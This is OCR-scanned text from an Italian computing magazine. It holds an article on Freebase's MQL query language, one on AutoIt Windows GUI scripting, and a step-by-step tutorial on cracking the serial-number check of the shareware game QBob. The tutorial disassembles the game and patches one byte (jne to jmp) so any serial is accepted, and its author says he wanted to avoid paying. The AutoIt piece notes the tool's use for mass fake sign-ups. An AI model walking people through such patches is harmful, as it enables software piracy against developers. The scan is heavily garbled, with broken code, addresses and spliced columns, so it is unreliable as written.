verrà suggerito ogni suo singolo libro 
e film, oltre al topic relativo ad Harry 
Potter come "fictìonal charactar". 
Tutto questo senza neanche bisogno 
di registrarsi all'interno del sistema: 
con una login e una password, invece, 
avremo la possibilità non solo di 
leggere i contenuti di ogni topic, ma 
anche di aggiornarli 0 di aggiungerne 
di nuovi. Pur essendo la modalità di 
accesso più sempiice alle informazioni 
di Freebase, l'interfaccia web non è 
tuttavia quella più potente. Questo 
sistema, infatti, dà il meglio di sé 
quando viene interrogalo in modo 
automatico tramite il suo linguaggio 
di query chiamato MQL (Metaweb 
Ouery Language). Questo linguaggio 




Esempi di 
query MQL 

Il linguaggio di query MQL è molto 
più semplice di quanto non sembri. 
Partendo dagli esempi presentati 
nella pagina del query editor è 
possibile scoprire facilmente 
informazioni interessanti. Ad 
esempio, la seguente query. 
[{ 

"a:starring n : [{ 
: 'actor": "Claudio Bisio" 

a 

"b:stan"ing": [{ 
"actor™: '"Christopher Lambert" 

a 

"name": nuli, 
"id": nuli, 
"staning": [( 
"actor": nuli 
% 

"type": "/film/film" 

}] 

mostra l'elenco dì film (e di attori 
per ogni film) in cui hanno recitato 
sia Claudio Bisio che Christopher 
Lambert (un premio a chi sa 
rispondere senza eseguire la query!). 



consente infatti di superare i limiti 
imposti dalla singola pagina Web e 
sfrutta la struttura a grafo dei dati per 
fornire in modo rapido informazioni 
aggregate. Nei box è mostrato un 
esempio molto semplice di query, 
ma tramite il query editor disponibile 
online (http://www.freebase.cam/ 
queryeditor} possiamo trovarne molti 
altri. Il query editor è uno strumento 
molto potente e semplice da usare: 
al suo intemo, infatti, compaiono 
sia esempi che possono essere 
facilmente usati come punto di 
partenza per query più complesse, 
Sia Urterai e guide per MQL 
Inoltre, in ogni momento è possibile 
trasformare la propria query in un link 
che restituisce i risultati della query 
in formato JSON, pronti da utilizzare 
all'interno della propria applicazione. 



Se, convinti dalla potenza di MQL, 
decidiamo di sviluppare applicazioni 
"Freebase-powered", non c'è da 
preoccuparsi: Metaweb ha sviluppato 
un servizio apposto, chiamato 
mqlread e disponibile all'indirizzo 
www.freebase.corrv^fe^^mqiread, 
al quale è sufficiente mandare la 
query sotto forma di HTTP G ET per 
ottenerne il risultato in JSON. Inoltre, 
sono state sviluppate diverse librerie 
che permettono di accedere in 
modo semplice a Freebase usando 
praticamente qualsiasi linguaggio di 
programmazione (fra quelli supportati, 
compaiono ad esempio Java, 
Javascript, Flash, Python, Peri e PHP}. 
Infine, per chi ama sperimentare 




tecnologie particolarmente innovative 
c'e' ACRE [http://wiki.freebase.CQm/ 
wiki/Acre): sì tratta di un ambiente di 
sviluppo opensource, sviluppato da 
Metaweb e accessibile online, che 
consente di scrivere applicazioni Web 
basate su Freebase in modo sempiice 
e collaborativo. Ogni utente, infatti, 
può scegliere di rendere pubbliche 
le proprie applicazioni e allo stesso 
tempo accedere al codice sorgente di 
quelle condivise da altri. 




Clicca qua e clicca là: la 
vita di un informatico 
sembra fatta di miliardi 
di clic, inesorabilmente 
uno dietro l'altra, 
Quando, poi, hai a 
Che fare con interfacce utente fatte 
da qualche genio che ti obbligano a 
migliaia di clic ripetitivi, le riflessioni 
sono solo desolanti. Fino a quando 
uno non si stanca di ripetere sempre 
le stesse azioni e non inizia a 
pensare che un computer potrebbe 
benissimo farsele da scio. Anche 
se l'interfaccia è stata pensata da 
qualcuno che meriterebbe il peggio 
della vita. Ad aiutare l'informatico 
esasperato dai clic ripetitivi c'è Autoit 
(www.autoitscript.com): un sistema 
dì scripting per la GUI di Windows 
che assomiglia moltissimo a un 
linguaggio di programmazione vero e 
proprio, Le sue caratteristiche, infetti, 
vanno ben oltre lo scripting: con una 
sintassi molto simile a quella di Visual 
Basic, scelta per renderne più facile 
l'apprendi manto dai programmatoli, 
Autoit permette di costruire script 
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SCRIPTING PER 
AUTDMATIZZ ARE 
LA GUI E PUD 
ESSERE USATO 
ANCHE COME 
LINGUAGGIO 
COMUNE. 



ad hoc per qualsiasi operazione 
riguardante Windovirs, simulando 
pressioni di tasti, movimenti dal 
mouse e manipolando a piacere 
le finestre dei programmi. Tutte 
operazioni impossibili 0 diffìcilmente 
realizzabili con altri linguaggi. 
Se vogliamo, possiamo persino 
trasformare gli script in EXE e questo 
si traduce nella possibilità, per 
esempio, di creare utility per l'input 
automatico di dati in form on line (si fa 
per dire, naturalmente ;) ) che possono 
essere ridistribuite a piacere, magari 
tramite un filo .torrent su misura. 
Dal punto di vista funzionale, il 
linguaggio supporta le espressioni 
complesse, le funzioni definite 
dall'utente, i cicli, le strutture 
decisionali e molto altro- Non solo: 
Autoit permette di creare delle QUI 
di comando da cui attivare parti 
dei suoi stessi script, ci permette 
$i usare espressioni regolari, può 
chiamare DLL esteme, non richiede 
installazione, a compatibile con 
qualsiasi versione di Windows e 
supporta Unicode. Non credo si possa 



Pensiamo, per esempio, a qualcosa 
che apra il Notepad, ci scriva dentro 
un testo e salvi il documento ottenuto, 
Apriamo l'editor fomite con Autoit 
(che non è nient'altro che una versione 
personafeata di ScìTe Lite) e iniziamo 



Runfnotepad.exe") 



Poi dobbiamo fare in modo che 
lo script attenda il caricamento di 
Notepad, Aggiungiamo una riga: 

WinWaitAct3venCLASS:Notepad]") 

A questo punto possiamo iniziare a 
scrivere testo nella finestra, usando il 
comando Send: 

Send("Questa è una prova,{ENTER}1 £ 
34 5 6 78910{£NTER}1 

Ora chi udiamo la finestra con ALT+f e 



Disegnare un otologìa analogico è 
complicato ma è un esempio che 
insegna moltissimo su Autoit 



selezionando e (esci): 





1 









Trasformare in Bf£ uno script è 
questione rli poclìl die del mouse. 
Possiamo persino scegliere l'icona. 



di Autolt e risulta persino migliore di 
equivalenti programmi commerciati, 
Se cerchiamo funzioni quali l'hash 
SHA o le codinone Base 64, invece, 
possiamo lane riferimento ad altri 
script Come la Autolt Machine Code 
Algorithm CoJlection [anche questa 
disponibile gratuitamente sul forum). 



NUN PER TUTTJ 



Sendflf") 

| Scnd(V) 
■ 

a questo punto, il Notepad ci 
■ chiederà conferma dei salvataggio 
del documento. Dovremo attendere 
la comparsa della finestra e negare il 
salvataggio [o confermarlo): 

WinWaitActivef'Bloceo note") 
Send(V) 

Ora aspettiamo che il programma si 
chiuda, dando il comando 

| WinWartCtoseriCLASSrNoterjadT) 



Nel nostro editor avremo ora uno 
script da B linee, sufficienti per 
eseguire te nostre operazioni con 
Notepad. Salvsmo lo script e apriamo 
il programma Run Script di Autolt, 
Selezioniamo lo script appena creato 
e guardiamolo in azione: sembra una 
magia ma è la realtà. 
Gli esempi installati con il programma 
sono molti ma facciamo attenzione: 
in Windows i nomi delle finestre sono 
localizzati e gli esempi sono studiati 
per funzionare sulla versione in lingua 
inglese; basta poco, però, per adattarli 
anche a un Windows italiano. 
Tra tutti gli esempi, alcuni sono 
particolarmente indicativi della 
potenza del programma. Clock. 
au3, per esempio, più che uno script 
sembra essere un programma vero e 
proprio. Non agisce sulla GUI ma eoa 
oggetti e layer per rappresentare un 
orologio in trasparenza sullo schermo. 
Per farlo tt lizze import di librerie già 
pronte tramite la direttiva Simport, 
dichiarazioni di variabili e costanti 
globali, una serie di funzioni scritte ad 
hoc e numerosi richiami alte API e a 
funzioni matematiche standard. 



di oggetti di questo genere ci 
permette di usare Autott anche per 
automatizzare operazioni particolari, 
che non vedono diretti cambiamenti 
nella situazione delle finestre. Non 
solo: la sua community di supporto 
sta sfruttando a fondo ogni possibilità 
offerta dal linguaggio, realizzando veri 
e propri programmi che estendono 
le capacità di programmi già 
esistenti oppure che li sostituiscono. 
RunasSPC, per esempio, è un 
programma a pagamento che gestisce 
le nostre password che può essere 
sostituto da uno script chiamato 
EncryptedRunAs, disponìbile sul 
forum di Autolt L'estensione di 
programmi, tuttavia, è una pratica più 
diffusa: uno script come OutlookBC 
UDF, che aggiunge funzioni di notifica 
a Outlook, vale da solo l'installazione 



La possibilità di manipolare oggetti di 
altri programmi Che Ci offre Autolt è 
certamente un pericolo perche' anche 
il programmatore meno esperto può 
creare script in grado di svolgere 
operazioni ripetitive ma anche la cui 
ripetizione può essere dannosa per 
altri. Un esempio è la compilazione 
di moduli di iscrizione a siti con dati 
fittizi: a mano fa, se non altro, perdere 
tempo. Con Autolt può dar vita a 
migliaia di iscrizioni in brevissimo 
tempo. Come Spesso avviene, 
ricordiamoci che il problema non 
riguarda lo stai mento (potente) ma il 
modo in cui Viene utilizzato, 
Personalmente intendo utilizzarlo per 
creare un'interfaccia più pratica di 
quella che il geniale creatore di GUI di 
cui parfavo all'inizio mi ha costrettoa 
usare finora, Basta click inutili! 



Le capacità di manipolazione di Autolt, 
però, non si esauriscono agendo sulla 
GUI. Già nell'esempio precedente, 
l'istruzione WinWaitCtOSe fa 
riferimento non al nome di una finestra 
ma a un oggetto "Notepad". Com'è 
facilmente intuibile, la manipolazione 
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Le tècniche Di protezione dei 

GIOCHI SI STANNO EVDLVEN DO ■ 
MA LA CHIAVE SERIALE E 
5EMPRE DI GRAN MODA. 
VEDIAMO COME AGGIRARLA. 



Lo scopo di questo articolo, 
che ha una funzione 
puramente didattica e si 
rivolge anche a coloro che 
programmano protezioni 
per i giochi che sviluppano, è 
quello di spiegare come bypassane 
la richiesta di inserimento di un 
codice seriale da parte di un gioco. 
Il gioco in questione si chiama 
QBob, rìsale a qualche anno fa 
(una decina per la precisione) e 
richiede una registrazione per la 
somma di 20 $ per poter avere 
più livelli e altro. Riprendendolo 
dopa un po' di tempo ho deciso 
di provare a riversalo per evitare 
di pagare la registrazione (a un 
team di programmatori che molto 
probabilmente non esiste nemmeno 
più, almeno sotto il nome di 
MoonRock Software Inc.). 
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□ LI STRUMENTI 



Per ii nostro scopo avremo bisogno 
di poco software, che elenchiamo di 
seguito: 

• QBob: ovviamente, per riversarlo, 
avremo bisogno del gioco Stesso, che 
possiamo trovane in versione demo a 
http^Aiw™.rnoonrock.com/qbob32l4. 
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Per comprendere la parte 



exe . 

-W32Dasm: nell'articolo 
verrà usato w32dasm come 
disassembler, ma potete 
usare il vostro preferito senza 
problemi. Per scaricare 
W32Dasm il link è http-Jf 
download.famouswhy.com/ 
software/w32dsm87.zip 
- HxD: coma per W32Dasm, 
come editor esadecimale nell'articolo 
verrà usato HxD per il semplice fatto 
che è il primo editor esadecimale che 
ho trovato per Windows cercando su 
googie, qualunque altro editor vi Offrirà 
le stesse performance. HxD lo trovate 
sul sito http://nxd.softonic.it/. 
Il disassembler ci servirà per 
visualizzare il contenuto dell'eseguibile 
di QBob nefe sue istruzioni in 
assembly, in modo da renderci la vita 
un po' più semplice invece di andare 
a leggere l'eseguìbile in binario. 
Una vote che avremo individuato la 
porzione di programma da modificane 
lo andremo a fare utilizzando l'editor 
esadecimale, che consente la 
modifica di fife binari. 



3. ALCUNE BASI 
PRIMA DI INIZIARE 



seguente dell'articolo è bene avere 
alcune conoscenze del campo 
in cui andremo a lavorare, ossia 
l'assembly e il reverse engineering. 
L'assembly è ii linguaggio più vicino 
al linguaggio macchina. Quello che 
andremo a fare sarà, utilizzando 
un disassembler, leggere il listato 
in assembly, trovare ia parte di 
istruzioni che si occupa del controlio 
del codice seriale e modificarlo in 
modo da permetterci di inserire 
qualunque seriale e farlo accettare. 
Il lavoro del disassembler è quello di 
prendere i singoli byte che formano 
un file binario a convertirli nella 
stringa a cui è convenzionalmente 
assegnato il dato byte; per 
esempio invece di andare a leggere 
01010000 leggeremo 'push eax', 
che è un'istruzione utilizzata per 
inserire nello stack il contenuto 
del registro eax. Nell'esempio 
0101 0000. corrispondente a 0x50, è 
Topcode relativo all'istruzione 'push 



mov Si, %eax 

cmp S1, %eax 

jne Iab2 
labi: 

mov $2, %eax 
Iab2: 

ine %eax 

In questo casa notiamo che, ai 
posto di una jump non condizionata 
ne abbiamo una condizionata.neflo 
specifico una Jump if Hai Equal 
(JNE).Questo tipo Ci jump salta 
solo se il confronto avvenuto in 
precedenza non è uguale, nel 
nostro caso, dato che abbiamo 
messo in sax il valore 1 e poi il 
registro è confrontato con il valore 



1380 ff 





phihl. jr.tr w 



mov $0, %eax 
lab: 

; istruzioni del ciclo 
ine %eax 

cmp $10, %eax ; far 

(i=0;k10rit+) 

jl lab 




nente incondizionato o condizionato.il 

Iremo a primo è identificato dall'istruzione 

nostra jmp, mentre quelli condizionati hanno 

dere differenti istruzioni a seconda della 

a JMP, condizione per cui avviene il salto, 

ome I salti non condizionati saltano in 

in qualunque situazione, se per esempio 
abbiamo questo listato: 




ionfronto 



il valore 2 al suo interno 



o e si 
zione 
a che 
eax 

di 

ump 

INZ 
if 

r 



Questo non è mollo importante 
ai fini di quanto andremo a fare 
nel nostro articolo, ma è sempre 
interessante sapere che una 
struttura ad alto livello come il far 
alla fine non è altro che una serie di 
poche istruzioni in assembly. 



àse 
aar 
ì con 
il le 
iizioni 



4. INIZIA IL 
REVERS I N S 



;lo for 

ile: 




Una volta installato OBob apriamo 
l'eseguibile che troviamo nella 
directory in cui f abbiamo instavate 
con W32Dasm. Quando l'avremo 
aperto avremo davanti la serie di 
istruzioni che vengono eseguite dal 
nostro programma, con a fianco ì 
relativi opeode. Dal momento che 
abbiamo, come potrete notare, 
una serie dì istruzioni beila lunga, 
dovremo restringere il campo di 
azione alle poche istruzioni che 




ci interessano. Per questo scopo 
W32Dasm può fare una cosa molto 
interessante, ossia mostrarci tutte 
le stringhe che vengono utilizzate 
all'interno del programma e i punti 
in cui vengono utiliziate. Prima 
di usare questo too! dovremo 
individuare la strìnga che vogliamo 
utilizzare per trovare il punto del 
programma in cui intervenire. 
La strìnga ideale è quella Che 
viene mostrata nel messaggio 
di errore ss inseriamo un serial 
sbagliato. Andando a ricercare 
dove viene usata quella stringa 
sapremo dov'è che viene fatto 
comparire il messaggio d'errore e 
di conseguenza potremo risalire 
al punto in cui viene effettuato 
il controllo del seriaie da noi 
inserito con quello calcolato dai 
programma. Una volta arrivati a 
quel punto dovremo modificare 
l'eseguibile in modo che venga 
accettato qualunque serial, ma 
procediamo un passo alla volta. 
Come abbiamo detto apriamo 
QBob, dal menù Game scegliamo 
Register, inseriamo dei dati 
casuali e otterremo il messaggio 
d'errore; 

■The serial number is invalid, 



Please make sur? it exactly 
matches (including dashes) the 
serial number provided to you by 
MoonRock Software Ino," 
Ora chiudiamo QBob (magari 
prima facciamoci una partita) 
s torniamo al disassembler, 
Andiamo sul menu Refs, quindi 
Strieig Data References, ossia, 
come detto in precedenza, il tool 
che ci consente di risalire alle 
stringhe usate dal programma, 
Scorrendo la lista di stringhe 
troveremo quella che ci interessa, 
"The serial number is invalid." 
Selezioniamola e verremo 
direzionati alla parto di codice che 
utilizza quella stringa: 

* Referencedbya(U) 

nconditionalor(C) 

on d iti o nalJu m pat Ad dress : 

|:QQ42EDAA[C) 



;0042EDD3 SB4660 

moveax, dwordptr[esi+60] 
:C042EDD6 50 push eax 

■0042EDD7 ESF401000C cali 
0042EFD0 
:0042EDDC S5C0 
test eax, sax 

:0Q42EDDE 7527 jne 



0042EE07 

;0Q42EDEO E8u25802£)ucall 

00454 5 E7 

:0042EDE5 SB401 0 

mov eax. dword ptr [eax+10] 

I0042EDE8 6A1 0 

push 00000010 

:0Q42EDEA 50 push eax 



P o s sì b leStri ngDataRef f rorn DataObj 
>"Theserialnumberisinvalid,"- 
s."Pleasemakesureitexactlymatches" 
>"(incl ud I n gdashes^theserìal" 
>"numberprovidedyouby 

MoonRock"> "Softwarelnc." 



:0042EDEB 6S4C214700 

push 0047214C 

:O042EDF0 SBCE 

mov ccx. esi 

:0042EDF2 E8EFDC0100 

cali O044CAE6 

:0042EDF7 5E 

pop esi 
:0042EDF6 SB4C240C 

mov ecx, dword 

ptr Eesp+0C] 

:0042EDFC 64890DOO 000000 
mov dword ptr 





EU 



fs:[O0000O0O], ecx 
:0O42EEO3 83C413 

add esp, 00000018 

:0042EE06 C3 

ret 

* Referencedbya(U) 

nconditionalorjc] 

onditionaklumpatAddress: 



|:0042EDDE[C) 

|:0042EE07 &BOD082B4700 

mov ecx, dword ptr [00472B08] 

:0042EEOD894C2408 

mov dword ptr [esptOB], ecx 

:0042EE11 8B565C 

movedx, dword ptr [esi+5C] 

:0042EE14 3D442406 

leaeax, dword ptr [esp+Qfi] 

:0042EE18 52 

push edx 



Possi bleStri ng DataReff ro mOataObj- 
> "QBobwi Il bereg isteredto' % s ' . "- 
>'lsfteorrect?" 



|:Q042EE1 9 6818214700 
push 00472116 

Vediamo chiaramente dove viene 
utilizzata la stringa. Ora dobbiamo 
letteralmente salire nel listato 
per arrivare a capire dov'è che 
avviene la "diramazione" in cui da 
una parte viene mostrato l'alert di 
errore e dall'altra viene registrato 
Correttamente QBob. Nel nostro 
caso siamo fortunati: 

;0042EDDE 7527 jne 0042EEO7 

Notiamo che avviene una Jump if 
Not Equal subito prima, e l'indirizzo 
a Cui si viene portati è G042EE07, 
che, se andiamo a vedere, si trova 
subito prima che venga utilizzata la 
stringa 

ffl^ "QBob ivi II be registered to "%s\ ls 
V it correct?" 

il che dovrebbe farci pensare che 
fa "diramazione" ohe stavamo 
cercando è proprio quella che 
abbiamo individuato. Siamo arrivati 
quindi al punto in cui sappiamo 
qual è l'istruzione da cui tutto 



che concludono 



registrazione 



5. RAGIONAMENTO 



Sappiamo ora che le nostre 
istruzioni sono qualcosa del genere; 
test eax, eax confronto del serial 
jne addr ;jne a un indirizzo 

'addr' 



Modificando il jne con un jc 
sarebbe come oambiare da 
"registra il programma se il serial è 
corretto" a "registra il programma 
se il serial inserito non è corretto", 
usando un jmp invece "registra il 
programma in ogni caso" in quanto 
è un salto non condizionato. 



mostrano il 
■■■ , 
d'errore 

addr: 

concludono 



istruzioni 



messaggio 



che 



listruzionì che 
;là registrazione 



CAMBIARE LE 
ISTRUZIONI 



Il nostro scopo, adesso, è quello 
di cambiare le istruzioni, per farlo 
abbiamo molte possibilità, eccone 
un paio: 

test eax, eax ;confronto del 
codice 

je/jmp addr ;con je il programma 
viene registrato solo se 

;il serial inserito è sbagliato, con 
una jmp 

;il programma viene registrato in 
ogni caso 



che mostrano il 

;messaggio d'errore 
addr: 



^istruzioni 



L'altra possibilità è quella dì 
inserire il giusto numero di NOP 
(Not Operation, istruzione che 
serve a non fare nulla e Che ha 
come opeode OxSO) in modo ohe 
non venga eseguito nessun jump e 
l'esecuzione del programma venga 
fatta "scivolare" direttamente alla 
registrazione, facendo qualcosa del 
tipo: 

test eax, eas ;confrontOdelcodiCe 
nop ; 
nop ; 

n °p ;ln questo 

modo portiamo il 

programma direttamente alla fine 



nop 

registrazione 

nop 

nop 

addr:... 

che concludono 
registrazione 



ideila 

1 

Sistruzioni 

ila 



istruzioni 



7. ,U N BYTE 
PUD FARE LA 
DIFFERENZA 



Delle soluzioni proposte 
nell'articolo verrà utilizzata la 
prima, che richiede la sostituzione 
del jne in un jmp, ma, volendo, si 
può usare anche il secondo metodo 
senza problemi o magari trovare 
altre vie... Basta usare la fantasia 
Per modificare il jne in una jmp 





wiwoiowijihisyi 



dobbiamo sostituire l'opcode 0x75 
(jne] Gon OxEB (jrnp) dell'istruzione 

:CQ42EDDE 7527 ine 
0042 EE07 

Mentre 0x27 è il numero di 
byte di cui saltare (nel caso 
39 bytes e, stranamente, 
0xD042EDDE [che è l'indirizzo 
deli'istruzioiìe)+ux02{ché 
sonò ii numero di byte usati 
dall'istruzione jne e Che non 
vanno coniantì)+0x27 (ossia di 
quanti byte saltare) ci da proprio 
0x0042 EE07. 



che abbiamo modificato, se non 
abbiamo fatto nessun errore 
andando sul menu Game e in 
seguito SU Register possiamo 
inserirò qualunque nome associato 
a qualunque seriale, avere la 
nostra copia registrata di OBob, 
per poter accedere così agli altri 
livelli etc etc 0 

darkjokerhttp://darkjoker. 
byeth ost9,com 



DISC LA I M E R 



Gli argomenti e le informazioni 
fomite nell'articolo sono da 
considerarsi a scopo puramente 
informativo. Utilizzare queste 
informazioni per evitare il 
pagamento della registrazione 
è un reato. L'autore e l'editore 
non si assumono nessuna 
responsabilità circa l'utilizzo 
improprio di quanto spiegato. 



Apriamo il nostro editor 
esadecimale e ricerchiamo la 
sequenza di byte: 

SS 4E SO 50 Ee F4 01 00 00 85 
CO 

che sono i byte subito 
prima della jne. Una 
volta trovati (magari non 
manualmente] possiamo 
sostituire il byte seguente 
(0x75) con OxEB. 

Salviamo e chiudiamo. Ora, 
per conferma, apriamo 
W32Dasm e andiamo 
all'indirizzo di prima: 

:0 04 2 ED DE EB27 jmp 
0042EE07 

Tutto come previsto. 
Avviamo ora l'eseguibile 
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